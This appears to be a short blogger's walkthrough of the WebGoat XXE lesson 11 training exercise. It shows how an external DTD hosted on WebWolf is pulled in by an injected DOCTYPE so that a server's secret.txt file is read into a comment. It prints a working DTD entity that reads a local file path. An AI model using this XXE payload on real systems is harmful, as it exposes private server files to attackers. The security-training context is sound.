This lesson is about remote file inclusion using XXE, the goal is to get the content of the file located on /home/webgoat/.webgoat-8.1.0/XXE/secret.txt and input it as a comment on the lesson form
Let’s start by writing a comment
In Burp the request contains our comment, as expected, and the response tells us that the solution is, of course, not correct
First things first, let’s create a DTD file, I will call it attackl11.dtd, that includes the requested secret.txt file
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY secret SYSTEM 'file:///home/webgoat/.webgoat-8.1.0//XXE/secret.txt'>Then upload this attackl11.dtd to WebWolf
And get its URL from WebGoat “link” here highlighted in red
Next send the request to Burp Repeater and start injecting XML
Add the DOCTYPE definition, the ENTITY towards our malicious DTD file and the reference to the &secret; ENTITY that is present inside the malicious DTD file, then send the request
When the comment is created, it will load the malicious DTD file present on the attacker machine, as of WebWolf screenshot
Subsequently, as of DTD request, the webapp will load the content of the secret.txt file we are interested in and put it in the comment right where the &secret; reference has been put in the HTTP request
Then just put the secret.txt file content as comment and the lesson is completed
This concludes WebGoat XXE 11
I hope you liked it.
PVXs — https://twitter.com/pivixih
